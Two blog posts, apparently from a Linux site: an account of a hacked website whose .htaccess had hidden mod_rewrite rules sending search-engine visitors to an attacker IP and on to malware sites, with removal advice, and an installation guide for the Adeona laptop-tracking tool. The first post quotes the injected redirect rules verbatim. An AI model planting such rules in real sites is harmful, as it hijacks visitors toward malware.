A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.

I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]

Which was also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess, the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh to check the file).

Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).

Using a combination of traceroute and Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites  – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page) which installs a cookie: av_inst=880147 (arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains Malware, which I presume does something nasty, although I felt no inclination to investigate further!

Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly be back to normal, receiving the search engine traffic it should.

So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Adeona is an Open Source system for tracking stolen and lost laptops/notebooks, developed by the University of Washington Computer Science and Engineering department. It’s also one of the few systems which doesn’t require a silly BIOS hack, or access to proprietary services, and is available for Linux, Windozzze and Mac OSX. Since 64bitjungle is a site dealing with Linux, I’ll obviously focus on the Linux version – although, the Windozzze and Mac versions are available as binary installers, so should be pretty easy to set up.

The only prerequisites for Adeona are OpenSSL, traceroute, libssl-dev, and cron which, with the exception of traceroute and libssl-dev, are installed by default on most Linus distributions. To install traceroute on Ubuntu, simly open a terminal (Applications -> Accessories -> Terminal) and run:

sudo apt-get install traceroute libssl-dev

Setting up Adeona itself involves downloading, compiling and installing a small client application. The current version, 0.2.1a, can be downloaded from the Adeona download page as a 3.5 Mb tarball. extract the tarball:

cd ~/Desktop
tar -zxvf adeona-0.2.1.tar.gz
cd adeona

32 Bit Installation

Installing on a 32 bit system is a snap not quite as easy as installing from a .deb, and involves compiling and configuring the source code:

./configure
sudo make install

64 Bit Installation

64 Bit systems entail much more work. Download and install the getlibs package:

wget http://www.boundlesssupremacy.com/Cappy/getlibs/getlibs-all.deb
sudo dpkg -i getlibs-all.deb

Then, from the adeoma directory, run:

getlibs -l libcrypto.a

This will detect, download and install any 32 bit libraries required to build Adeona. In many cases, this will be libssl-dev. If you don’t have them already, the ia32-libs package also needs installing:

sudo apt-get install ia32-libs

The Makefile may also requires a small change, so first make a backup, then open it up in a text editor:

cp Makefile Makefile.bak
gksu gedit Makefile

Find the CFLAGS variable (the line “CFLAGS := -Wall” – line 46 in the current release) and add a new line after it, with “CFLAGS += -m32″, so that the lines are now:

CFLAGS := -Wall
CFLAGS += -m32

Save the file, and close the text editor. Now, configure, and install:

./configure
sudo make install

This should hopefully work for most users. However, I was receiving the following error when compiling:

/usr/include/gnu/stubs.h:7:27: error: gnu/stubs-32.h: No such file or directory

Installing libc6-dev-i386 solved the problem:

sudo apt-get install libc6-dev-i386

If you had to install libc6-dev-i386 following the above error, remember to run:

make clean

before running

sudo make install

Post Installation Steps (32 and 64 Bit)

Adeona initialises immediately after the code has compiled and installed, and requires a little configuration. First, it asks for a password, and to verify the password. Finally, a line needs to be added to crontab – this line is output once the installation and initialisation is complete. It’s dependent on where you installed Adeona, but the default is:

@reboot /usr/local/adeona/adeona-client.exe -s /usr/local/adeona/adeona-clientstate.cst -r /usr/local/adeona/resources/ -l /usr/local/adeona/logs/ &

So, highlight the line output by Adeona, right click and “Copy” , then open up crontab for editing:

sudo crontab -e

and choose “nano” (it’s much easier than vi(m) if you’ve never used a text editor from the terminal before). Move the cursor to the end of the last line, and hit return to add a new line, then right click and “Paste” the line output from Adeona. Push Ctrl+X to exit, and choose “Y” to save the changes. If you’re using vi, then you know what to do… That’s it.

During the installation process, a file called “adeona-retrievecredentials.ost” was created – move it to a better location, and/or make a note/remember that location.

Reboot.

Data Retrieval

Simple data retrieval can be executed by the following, in a Terminal:

/usr/local/adeona/adeona-retrieve.exe -r /usr/local/adeona/resources/ -l /path/to/results -s /path/to/your/adeona-retrievecredentials.ost -n 1

Change /path/to/results to some thing such as /home/<username>/adeona-results.txt (where <username> is your username), and /path/to/your/adeona-retrievecredentials.ost to the location the file adeona-retrievecredentials.ost was saved (told you to remember it!).

This is fine for testing, but since you’re using the machine that Adeona is installed on, and thus the one you want to track, to locate it… Not very useful if it gets stolen. Simply copy the adeona-retrievecredentials.ost file to a USB drive, Memory stick, or whatever – this file can then be used from any computer with the Adeona Retrieval Tools installed (also easy to install) to retrieve it’s last known location.

More information can be found at http://adeona.cs.washington.edu/documents.html

Uninstalling Aedona

If you need to uninstall Aedona, simply run the following form a Terminal:

sudo pkill adeona-client.exe
sudo rm -rf /usr/local/adeona

Then run:

sudo crontab -e

and delete the line previously added to crontab.

References

1. Adeona Linux Installation Notes
2. Solving 64 Bit Dependency Issues
3. Adeona Google User Group
4. Privacy-Preserving Location Tracking of Lost or Stolen Devices: Cryptographic Techniques and Replacing Trusted Third Parties with DHTs (PDF)
   

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.